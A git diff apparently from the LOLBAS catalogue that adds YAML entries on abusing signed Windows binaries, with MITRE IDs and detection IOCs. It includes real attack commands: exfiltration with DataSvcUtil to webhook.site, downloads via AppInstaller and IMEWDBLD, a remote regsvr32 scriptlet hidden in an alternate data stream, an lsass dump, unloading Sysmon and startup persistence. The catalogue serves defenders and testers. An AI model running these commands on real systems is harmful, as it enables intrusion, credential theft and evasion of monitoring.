diff --git a/yml/LOLUtilz/OtherBinaries/Upload.yml b/yml/LOLUtilz/OtherBinaries/Upload.yml new file mode 100644 index 0000000..6cfa0a3 --- /dev/null +++ b/yml/LOLUtilz/OtherBinaries/Upload.yml @@ -0,0 +1,18 @@ +--- +Name: Update.exe +Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation. +Author: 'Jesus Galvez' +Created: '2020-11-01' + - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 7 and up with Whatsapp installed +Full_Path: + - Path: '%localappdata%\Whatsapp\Update.exe' +Detection: + - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process +--- diff --git a/yml/OSBinaries/AppInstaller.yml b/yml/OSBinaries/AppInstaller.yml new file mode 100644 index 0000000..2b7c39d --- /dev/null +++ b/yml/OSBinaries/AppInstaller.yml @@ -0,0 +1,22 @@ +--- +Name: AppInstaller.exe +Description: Tool used for installation of AppX/MSIX applications on Windows 10 +Author: 'Wade Hickey' +Created: '2020-12-02' +Commands: + - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw + Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\ + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1333900137232523264 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml new file mode 100644 index 0000000..7cbd821 --- /dev/null +++ b/yml/OSBinaries/Aspnet_Compiler.yml @@ -0,0 +1,28 @@ +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 081f515..19947c2 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,6 +1,6 @@ --- Name: Certutil.exe -Description: Windows binary used for handeling certificates +Description: Windows binary used for handling certificates Author: 'Oddvar Moe' Created: 2018-05-25 Commands: diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1d08c32..e82eac4 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml @@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: 2019-06-26 Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml new file mode 100644 index 0000000..e5dd633 --- /dev/null +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -0,0 +1,30 @@ +--- +Name: DataSvcUtil.exe +Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. +Author: 'Ialle Teixeira' +Created: '01/12/2020' +Commands: + - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + MitreLink: https://attack.mitre.org/techniques/T1567/ + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe +Code_Sample: + - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 +Detection: + - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. + - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. +Resources: + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services + - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +Acknowledgement: + - Person: Ialle Teixeira + Handle: '@NtSetDefault' +--- diff --git a/yml/OSBinaries/Dllhost.yml b/yml/OSBinaries/Dllhost.yml new file mode 100644 index 0000000..30c9d76 --- /dev/null +++ b/yml/OSBinaries/Dllhost.yml @@ -0,0 +1,30 @@ +--- +Name: Dllhost.exe +Description: Used by Windows to DLL Surrogate COM Objects +Author: 'Nasreddine Bencherchali' +Created: '2020-11-07' +Commands: + - Command: dllhost.exe /Processid:{CLSID} + Description: Use dllhost.exe to load a registered or hijacked COM Server payload. + Usecase: Execute a DLL Surrogate COM Object. + Category: Execute + Privileges: User + MitreID: T1546.015 + MitreLink: https://attack.mitre.org/techniques/T1546/015/ + OperatingSystem: Windows 10 (and likely previous versions) +Full_Path: + - Path: C:\Windows\System32\dllhost.exe + - Path: C:\Windows\SysWOW64\dllhost.exe +Code_Sample: +- Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/CyberRaiju/status/1167415118847598594 + - Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 +Acknowledgement: + - Person: Jai Minton + Handle: '@CyberRaiju' + - Person: Nasreddine Bencherchali + Handle: '@nas_bench' +--- diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index f0a10af..9c4c1b5 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -42,7 +42,7 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: finstr.exe should normally not be invoked on a client system + - IOC: findstr.exe should normally not be invoked on a client system Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index c9d598c..72e185a 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml @@ -20,6 +20,14 @@ Commands: MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.proj + Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + Usecase: Execute project file that contains XslTransformation tag parameters + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -27,8 +35,9 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe -Code_Sample: -- Code: + - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe +Code_Sample: + - Code: Detection: - IOC: Msbuild.exe should not normally be executed on workstations Resources: @@ -36,9 +45,12 @@ Resources: - Link: https://github.com/Cn33liz/MSBuildShell - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' ---- + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml new file mode 100644 index 0000000..55662df --- /dev/null +++ b/yml/OSBinaries/Pnputil.yml @@ -0,0 +1,23 @@ +--- +Name: Pnputil.exe +Description: used for Install drivers. +Author: Hai vaknin (lux) +Created: 25/12/2020 +Commands: + - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf + Description: used for Install drivers + Usecase: add malicious driver. + Category: Execute + Privileges: Administrator + MitreID: T1215 + MitreLink: https://attack.mitre.org/techniques/T1215 + OperatingSystem: Windows 10,7 +Full_Path: + - Path: C:\Windows\system32\pnputil.exe +Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf +Acknowledgement: + - Person: Hai Vaknin(Lux) + Handle: 'LuxNoBulIshit' + - Person: Avihay eldad + Handle: 'aloneliassaf' +--- diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index e2748cf..5b0f5d4 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 9c00099..964f370 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -19,6 +19,7 @@ Code_Sample: Detection: - IOC: wsreset.exe launching child process other than mmc.exe - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command + - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen Resources: - Link: https://www.activecyber.us/activelabs/windows-uac-bypass - Link: https://twitter.com/ihack4falafel/status/1106644790114947073 diff --git a/yml/OSBinaries/fltMC.yml b/yml/OSBinaries/fltMC.yml new file mode 100644 index 0000000..c22696a --- /dev/null +++ b/yml/OSBinaries/fltMC.yml @@ -0,0 +1,26 @@ +--- +Name: fltMC.exe +Description: Filter Manager Control Program used by Windows +Author: 'John Lambert' +Created: '2021-09-18' +Commands: + - Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562 + MitreLink: https://attack.mitre.org/techniques/T1562/002/ + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\fltMC.exe +Code_Sample: +- Code: +Detection: + - IOC: 4688 events with fltMC.exe +Resources: + - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +Acknowledgement: + - Person: Carlos Perez + Handle: '@Carlos_Perez' +--- diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml new file mode 100644 index 0000000..81e37cd --- /dev/null +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -0,0 +1,26 @@ +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml new file mode 100644 index 0000000..8f92417 --- /dev/null +++ b/yml/OSScripts/UtilityFunctions.yml @@ -0,0 +1,26 @@ +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml new file mode 100644 index 0000000..9857834 --- /dev/null +++ b/yml/OtherMSBinaries/Adplus.yml @@ -0,0 +1,27 @@ +--- +Name: adplus.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/9/2021 +Commands: + - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet + Description: Creates a memory dump of the lsass process + Usecase: Create memory dump and parse it offline + Category: Dump + Privileges: SYSTEM + MitreID: T1003 + MitreLink: https://attack.mitre.org/techniques/T1003/ + OperatingSystem: All Windows +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index db03291..8b1004b 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -12,6 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: | + cdb.exe -pd -pn + .shell + Description: Attaching to any process and executing shell commands + Usecase: Run a shell command under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe @@ -23,7 +33,12 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda -Acknowledgement: + - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ +Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- + - Person: mr.d0x + Handle: '@mrd0x' + - Person: Spooky Sec + Handle: '@sec_spooky' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml new file mode 100644 index 0000000..66f55f7 --- /dev/null +++ b/yml/OtherMSBinaries/Fsi.yml @@ -0,0 +1,38 @@ +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml new file mode 100644 index 0000000..855f7d7 --- /dev/null +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -0,0 +1,36 @@ +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml new file mode 100644 index 0000000..8e7a935 --- /dev/null +++ b/yml/OtherMSBinaries/Remote.yml @@ -0,0 +1,43 @@ +--- +Name: Remote.exe +Description: Debugging tool included with Windows Debugging Tools +Author: mr.d0x +Created: 1/6/2021 +Commands: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: AWL Bypass + Privileges: User + MitreID: + MitreLink: + OperatingSystem: + - Command: Remote.exe /s "powershell.exe" anythinghere + Description: Spawns powershell as a child process of remote.exe + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: + - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + Description: Run a remote file + Usecase: Executing a remote binary without saving file to disk + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: +Full_Path: + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe +Code_Sample: + - Code: +Detection: + - IOC: remote.exe spawned +Resources: + - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ +Acknowledgement: + - Person: mr.d0x + Handle: '@mrd0x' +--- diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 49809c5..0a022cf 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -92,6 +92,22 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --createShortcut=payload.exe -l=Startup + Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1547 + MitreLink: https://attack.mitre.org/techniques/T1547/001/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed + - Command: Update.exe --removeShortcut=payload.exe -l=Startup + Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. + Usecase: Execute binary + Category: Execute + Privileges: User + MitreID: T1070 + MitreLink: https://attack.mitre.org/techniques/T1070/ + OperatingSystem: Windows 7 and up with Microsoft Teams installed Full_Path: - Path: '%localappdata%\Microsoft\Teams\update.exe' Code_Sample: @@ -114,4 +130,5 @@ Acknowledgement: Handle: '@MrUn1k0d3r' - Person: Adam Handle: '@Hexacorn' + - Person: Jesus Galvez --- diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml new file mode 100644 index 0000000..33d36a5 --- /dev/null +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -0,0 +1,26 @@ +--- +Name: VSIISExeLauncher.exe +Description: Binary will execute specified binary. Part of VS/VScode installation. +Author: 'timwhite' +Created: '2021-09-24' +Commands: + - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + Description: The above binary will execute other binary. + Usecase: Execute any binary with given arguments. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 and up with VS/VScode installed +Full_Path: + - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' +Code_Sample: + - Code: +Detection: + - IOC: VSIISExeLauncher.exe spawned an unknown process +Resources: + - Link: https://github.com/timwhitez +Acknowledgement: + - Person: timwhite + Handle: +--- diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml new file mode 100644 index 0000000..dafea55 --- /dev/null +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -0,0 +1,31 @@ +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml new file mode 100644 index 0000000..8542015 --- /dev/null +++ b/yml/OtherMSBinaries/Wfc.yml @@ -0,0 +1,28 @@ +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 86ac6a0..e1625d2 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -13,6 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows Full_Path: + - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe - 